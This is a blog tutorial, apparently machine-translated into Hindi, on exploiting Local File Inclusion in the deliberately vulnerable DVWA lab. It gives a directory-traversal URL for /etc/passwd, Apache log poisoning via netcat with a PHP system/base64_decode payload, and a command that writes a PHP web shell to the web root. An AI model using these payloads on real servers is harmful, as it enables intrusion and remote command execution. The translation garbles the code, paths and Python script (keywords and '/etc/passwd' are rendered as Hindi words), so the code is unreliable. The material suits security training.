अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI)
लेखक:
अशफाक अंसारी

द्वारा समीक्षित:
रेटिंग:
5
पर मार्च 18, 2013
अंतिम संशोधित:मार्च 18, 2013

सारांश:

स्थानीय फ़ाइल का समावेश (LFI) असुरक्षा की एक प्रकार सबसे अक्सर वेबसाइटों पर पाया जाता है. यह एक हमलावर एक स्थानीय फ़ाइल शामिल करने के लिए अनुमति देता है, आमतौर पर वेब सर्वर पर एक स्क्रिप्ट के माध्यम से. भेद्यता उचित सत्यापन के बिना उपयोगकर्ता की आपूर्ति इनपुट के प्रयोग की वजह से होता है.

परिचय

 

के पहले भाग में अरे संवेदनशील वेब अनुप्रयोग (DVWA) कई, हम स्थापित कर सकते हैं कि कैसे देखा है अरे संवेदनशील वेब अनुप्रयोग (DVWA) पर पीछे 5 आर 1.
 


 

अब, हम के रूप में जाना जाता है एक और हमले वेक्टर परीक्षण करेगा स्थानीय फ़ाइल का समावेश (LFI).
 

स्थानीय फ़ाइल का समावेश (LFI) असुरक्षा की एक प्रकार सबसे अक्सर वेबसाइटों पर पाया जाता है. यह एक हमलावर एक स्थानीय फ़ाइल शामिल करने के लिए अनुमति देता है, आमतौर पर वेब सर्वर पर एक स्क्रिप्ट के माध्यम से.
 

भेद्यता उचित सत्यापन के बिना उपयोगकर्ता की आपूर्ति इनपुट के प्रयोग की वजह से होता है. इस फाइल की सामग्री outputting के रूप में कम से कम के रूप में कुछ करने के लिए नेतृत्व कर सकते हैं, लेकिन गंभीरता पर निर्भर करता है, कुछ की सूची पर यह करने के लिए नेतृत्व कर सकते हैं:
 


1. वेब सर्वर पर कोड का निष्पादन.
2. ऐसे क्रॉस साइट स्क्रिप्टिंग के रूप में अन्य हमलों के लिए नेतृत्व कर सकते हैं, जो इस तरह जावास्क्रिप्ट के रूप में ग्राहक पक्ष पर कोड का निष्पादन (XSS).
3. सेवा से वंचित (डॉस).
4. डाटा चोरी और डेटा हेरफेर.

 

अब, पीछे विचार स्थानीय फ़ाइल का समावेश (LFI) हमले सदिश है कि, यह वेब सर्वर का उपयोग करने की अनुमति है अगर एक हमलावर चपेट वेब स्क्रिप्ट का उपयोग कर वेब सर्वर पर स्थानीय फ़ाइलों को शामिल करने के लिए अनुमति देता है.
 

आप सब सोच रहे होंगे “इसमें एक बड़ा सौदा क्या है?”.
 

अच्छी तरह से, मैं यह एक बहुत ही गंभीर मुद्दा है कि कहना होगा वेब सर्वर ठीक से कॉन्फ़िगर नहीं है अगर.
 

चलो, एक हमलावर कमजोर PHP स्क्रिप्ट के माध्यम से वेब सर्वर पर एक स्थानीय फ़ाइल शामिल करने के लिए सक्षम है उस पर विचार. यह वह शामिल किया जा रहा है कि फाइल में नहीं है जो किसी भी PHP कोड को निष्पादित करने में सक्षम हो जाएगा मतलब.
 

अब, आप में से कुछ सोच रहे होंगे “यह लाभ का उपयोग करने के लिए एक हैकर मदद नहीं करता है जब एक स्थानीय फ़ाइल शामिल करके PHP स्क्रिप्ट क्रियान्वित करने का क्या फायदा है?”.
 

Apache HTTP सर्वर वेब सर्वर पर होता है कि सब कुछ के प्रवेश के लिए अलग तंत्र की एक किस्म प्रदान करता है, प्रारंभिक अनुरोध से, यूआरएल मानचित्रण प्रक्रिया के माध्यम से, कनेक्शन के अंतिम संकल्प, प्रक्रिया में हुई हो सकती है कि किसी भी त्रुटि सहित.
 

यहाँ पर पाया सुरक्षा चेतावनी का एक टुकड़ा है Apache HTTP सर्वर के प्रलेखन पेज.
 

लिंक: http://httpd.apache.org/docs/2.4/logs.html
 

सुरक्षा चेतावनी: अपाचे httpd एक लॉग फ़ाइल लेखन है जहां निर्देशिका के लिए लिख सकते हैं, जो किसी को भी लगभग निश्चित रूप से सर्वर के रूप में शुरू कर दिया है कि यूआईडी के लिए पहुँच प्राप्त कर सकते हैं, जो सामान्य रूप से जड़ है. लोग निर्देशिका के लिए लेखन पहुँच नहीं देते लॉग परिणामों के बारे में पता किया जा रहा बिना में जमा हो जाती है. विवरण के लिए सुरक्षा युक्तियाँ दस्तावेज़ देखने. इसके अलावा, लॉग इन फ़ाइलों ग्राहक से सीधे आपूर्ति की जानकारी हो सकती है, भागने के बिना. इसलिए, दुर्भावनापूर्ण ग्राहकों को लॉग इन फ़ाइलों में नियंत्रण वर्ण सम्मिलित करने के लिए यह संभव है, इतना ख्याल कच्चे लॉग से निपटने में लिया जाना चाहिए.

 

सूचनार्थ, में पीछे 5 आर 1, the Apache HTTP सर्वर के लॉग फ़ाइल में स्थित है:
 

/var / log / apache2 / access.log

/var/log/apache2/error.log


 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) फ़ाइल पथ प्रवेश
 

आप पहले से ही लॉग निर्देशिका अनुमतियों के बारे में ऊपर सुरक्षा चेतावनी पढ़ा है. हमलावर का उपयोग कर लॉग फ़ाइल पथ पाने में सफल होता है निर्देशिका चंक्रमण हमले, वह लॉग इन फ़ाइलों में दुर्भावनापूर्ण कोड लिख कर इन लॉग जहर कर सकते हैं, अगर “लॉग इन” निर्देशिका और फाइल अनुमति ठीक से विन्यस्त नहीं कर रहे हैं.
 

हम कैसे हम कर सकते हैं को देखकर किया जाएगा जहर the लॉग फाइल इस पोस्ट के बाद के हिस्से में.
 

के बारे में बुनियादी जानकारी के साथ सशस्त्र स्थानीय फ़ाइल का समावेश (LFI), चलो आगे बढ़ना है और व्यावहारिक सत्र में यह अनुभव.
 

नोट: पीछे में 5 आर 1, the “access.log” के लिए फ़ाइल की पहुँच अनुमति “अन्य लोग” पर सेट है “वर्जित”.

 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) फ़ाइल अनुमति प्रवेश
 

अब, के दे “पढ़ें” अनुमति के लिए प्रवेश “अन्य लोग”.
 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) फ़ाइल अनुमति प्रवेश पढ़ें
 

हम स्थापित कर रहे हैं “पढ़ें” हम प्रदर्शन कर रहे हैं ताकि अनुमति स्थानीय फ़ाइल का समावेश (LFI) का उपयोग कर हमले वेक्टर अरे संवेदनशील वेब अनुप्रयोग (DVWA).
 

तैयार हो जाओ और जाओ.

 

लॉगिन करने के लिए करते हैं अरे संवेदनशील वेब अनुप्रयोग (DVWA) और सेट सुरक्षा स्तर पर निम्न.
 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) कम से सुरक्षा
 

पर क्लिक करें फ़ाइल का समावेश.
 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) फ़ाइल का समावेश टैब
 

एचटीटीपी://192.168.96.128/dvwa / कमजोरियों / / में?पृष्ठ = include.php

 

एक फ़ाइल शामिल करने के लिए संपादित ?पृष्ठ = index.php शामिल किया गया है जो फ़ाइल निर्धारित करने के लिए यूआरएल में.
 

ऊपर यूआरएल के लिए वास्तव में कमजोर है कि क्या की पुष्टि चलो स्थानीय फ़ाइल का समावेश.
 

हम क्या करेंगे निर्देशिका चंक्रमण और शामिल करने की कोशिश /संपादन / आदि फ़ाइल. इस समावेश सफल है, हम की सामग्री मिल जाएगा /संपादन / आदि वेब पेज पर प्रदर्शित.
 

एचटीटीपी://192.168.96.128/dvwa / कमजोरियों / / में?पेज = .. / .. / .. / .. / .. / आदि / पासवर्ड

 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) /etc/passwd Inclusion
 

वो ठीक लगता है! हम में शामिल करने में सक्षम थे /संपादन / आदि में फाइल अरे संवेदनशील वेब अनुप्रयोग (DVWA) सफलतापूर्वक वेब पेज के रूप में की पूरी सामग्री को प्रदर्शित किया गया है /संपादन / आदि फ़ाइल.
 

हमारा अगला कार्य शामिल करने के लिए प्रयास करने के लिए है अपाचे के प्रवेश फ़ाइल. फिर, हम का उपयोग करेगा निर्देशिका चंक्रमण और शामिल करने की कोशिश /var / log / apache2 / access.log फ़ाइल.
 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) Access Log Inclusion
 

एचटीटीपी://192.168.96.128/dvwa / कमजोरियों / / में?पेज = .. / .. / .. / .. / log / apache2 / access.log

 

Wow! यह हमारे लिए एक अच्छा दिन है. हालात एक अच्छी तरह से बाहर काम कर रहे हैं. अपाचे वेब सर्वर access.log फ़ाइल सफलतापूर्वक शामिल किया जाता है. ऐसा लगता है कि अब एक बड़ा संकेत है, हम की ओर सिर और करने की कोशिश कर सकते हैं जहर the अपाचे की त्रुटि लॉग.
 

नोट: मैं इस पीछे का उपयोग कर रहा है के रूप में 5 एक वर्ष के बाद से आर 1. मैं बाहर साफ हो जाएगा access.log और error.log मैं आसानी से आप लॉग इन फ़ाइलों का जहर हिस्से को दिखाने के लिए कर रहा हूँ ताकि.    

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) स्पष्ट लॉग्स

हम करने के लिए तैयार हैं जहर the access.log फ़ाइल. इस हमलावर को शामिल करने में मदद मिलेगी के रूप में यह एक महत्वपूर्ण कदम है access.log फ़ाइल और निष्पादित जहर PHP कोड करने के लिए लिखा जाएगा कि access.log इस चरण में फाइल. विषाक्तता की सामग्री की जाँच के द्वारा पुष्टि कर सकते हैं error.log फ़ाइल.
 

एक खोलें अंतिम और से कनेक्ट अपाचे वेब सर्वर बंदरगाह पर 80 का उपयोग करते हुए netcat.
 

1
2
3
जड़ @ बीटी:~ # नेकां 192.168.96.128 80

जाओ /hazStart<?php प्रणाली(base64_decode($_GET[एक]));?>एचटीटीपी hazEnd/1.1

 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) ज़हर लॉग्स
 

अब, जहर सफल था पुष्टि करें कि क्या देता है. इसके लिए, हम दोनों खुलेगा access.log और error.log फाइल और यह प्रविष्टियों को समझने की कोशिश.
 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) ज़हर लॉग्स
 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) ज़हर लॉग्स
 

शीतल! हम जहर लॉग इन फ़ाइलों. हर चीज की उम्मीद के रूप में काम किया है.
 

नोट: हम पहले से ही में एक मिनी PHP खोल लिखा है access.log लॉग फ़ाइल. अब हमारा अगला मकसद धिक्कार संवेदनशील वेब अनुप्रयोग की मेजबानी वेब सर्वर के रूट में एक और मिनी PHP खोल लिखने के लिए है (DVWA).

 

यहाँ वेब सर्वर पर एक मिनी PHP खोल लिखेंगे कि आदेश है.
 

1
गूंज "<?php प्रणाली(base64_decode($_GET['पी'])); ?>" > ../../webshell.php

 

अगर तुम्हें याद है मिनी PHP खोल हम में इंजेक्ट किया कि स्क्रिप्ट access.log फ़ाइल, खोल स्क्रिप्ट कोड नीचे दिया गया है:
 

1
<?php प्रणाली(base64_decode($_GET['एक'])); ?>

 

आप खोल स्क्रिप्ट कोड देखने के बाद हमें क्या करना चाहिए कि अगले कदम के लिए अनुमान लगा सकते हैं?
 

अच्छी तरह से, अब हम का उपयोग कर वेब सर्वर के रूट को छोटा PHP खोल स्क्रिप्ट लिखने के लिए आदेश सांकेतिक शब्दों में बदलना होगा base64 एन्कोडिंग एल्गोरिथ्म.
 

यहां तक ​​कि एक साधारण अजगर कार्यक्रम है base64 एनकोड एक स्ट्रिंग:
 

1
2
3
4
5
#!/Usr / bin / अजगर

base64encodedstr = """echo "<?php प्रणाली(base64_decode($_GET['पी'])); ?>" > ../../webshell.php"""

प्रिंट "\पताएनकोड स्ट्रिंग: " + base64encodedstr.सांकेतिक शब्दों में बदलना('Base64','सख्त') + "\पता"

 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) Base64 Encode
 

The base64 एनकोडेड स्ट्रिंग नीचे दिया गया है:
 

1
ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=

 

हम एक खोल के साथ स्वागत कर रहे हैं इससे पहले कि यह अंतिम कदम होने जा रहा है. 🙂
 

हम करने के लिए नेविगेट जाएगा यूआरएल लिखने के लिए नीचे दिए गए मिनी पीएचपी खोल स्क्रिप्ट से वेब सर्वर के रूट.

एचटीटीपी://192.168.96.128/dvwa / कमजोरियों / / में?पेज = .. / .. / .. / .. / log / apache2 / access.log?एक = ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA / PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA =

 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) PHP Web Shell
 

अंत में!! हम इसे सफलतापूर्वक किया है. हम एक अपलोड की गई है मिनी PHP खोल एक का उपयोग कर स्थानीय फ़ाइल का समावेश जोखिम में अरे संवेदनशील वेब अनुप्रयोग (DVWA).
 

मैं स्वचालन प्यार और है कि मैं अजगर प्यार कारण है. अजगर बहुत आसानी से जटिल काम को पूरा करने के लिए आप उत्कृष्ट शक्ति देता है.
 

मुझे लगता है हम के शोषण को स्वचालित करने के लिए लिखा था कि एक अजगर स्क्रिप्ट में लिखा है स्थानीय फ़ाइल का समावेश (LFI) में अरे संवेदनशील वेब अनुप्रयोग (DVWA).
 

अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI) स्क्रिप्ट शोषण
 

शोषण स्क्रिप्ट की लंबाई बहुत बड़ी है, मैं इस पोस्ट में इस्तेमाल सभी लिपियों ज़िपित और डाउनलोड के लिए उपलब्ध है है.
 

डाउनलोड अरे संवेदनशील वेब अनुप्रयोग – स्थानीय फ़ाइल का समावेश (LFI) सामग्री पोस्ट:
 

DVWA - LFI शोषण लिपियों
3.9 किबा
644 डाउनलोड
विवरण ...

 

इस पोस्ट को पढ़ने के लिए अपने समय लेने के लिए धन्यवाद. मैं यह आपको मदद मिलती आशा. आप के बारे में कुछ भी चर्चा करना चाहते हैं तो आपको कोई शक है या अगर टिप्पणी वापस छोड़ने के लिए स्वतंत्र महसूस कृपया स्थानीय फ़ाइल का समावेश (LFI).
 

46,415 कुल देखा गया, 26 विचारों आज

निम्नलिखित दो टैब नीचे सामग्री को बदलने.

अशफाक अंसारी

सुरक्षा शोधक
अशफाक अंसारी के संस्थापक है HackSys टीम कोड नाम "पेंथेरा". उन्होंने कहा कि सूचना सुरक्षा के विभिन्न पहलुओं में अनुभव के साथ एक सुरक्षा शोधकर्ता है. उन्होंने लिखा है, "HackSys चरम कमजोर चालक" और "मौत की shellcode". उन्होंने यह भी लिखा है और निम्न स्तर के सॉफ्टवेयर शोषण पर विभिन्न whitepapers प्रकाशित किया है. उनकी कोर हित में निहित है "निम्न स्तर शोषण", "रिवर्स इंजीनियरिंग", "कार्यक्रम के विश्लेषण" और "हाइब्रिड Fuzzing". उन्होंने कहा कि आर्टिफिशियल इंटेलिजेंस और मशीन लर्निंग के एक fanboy है. उन्होंने कहा कि के लिए अध्याय का नेतृत्व है अशक्त पुणे.

2 की प्रतिक्रियाएं “अरे संवेदनशील वेब अनुप्रयोग - स्थानीय फ़ाइल का समावेश (LFI)”

  1. के.सी. कहते हैं:

    यह access.log पर पढ़ने की अनुमति के बिना हमले को दिखाने के लिए संभव हो सकता है. अनुमति सेट छोड़ने दूसरे शब्दों में मना करने के लिए? सबसे सर्वर पहली जगह में इस सेट हो सकता है के बाद से. काफी सराहना की जाएगी.

    • हाय के.सी.,

      दुर्भाग्य, लॉग फाइल करने की जरूरत है पढ़ने की अनुमति पर access.log.

      जब तक, हम फ़ाइल को पढ़ने में सक्षम हैं, हम हमले के लिए बाहर ले जाने में सक्षम नहीं होगा.

      तथापि, आप कर सकते हैं अलग हमले वैक्टर कोशिश.

      धन्यवाद.

एक उत्तर दें छोड़ दो

आपका ईमेल पता प्रकाशित नहीं किया जाएगा. आवश्यक क्षेत्रः चिह्नित कर रहे हैं *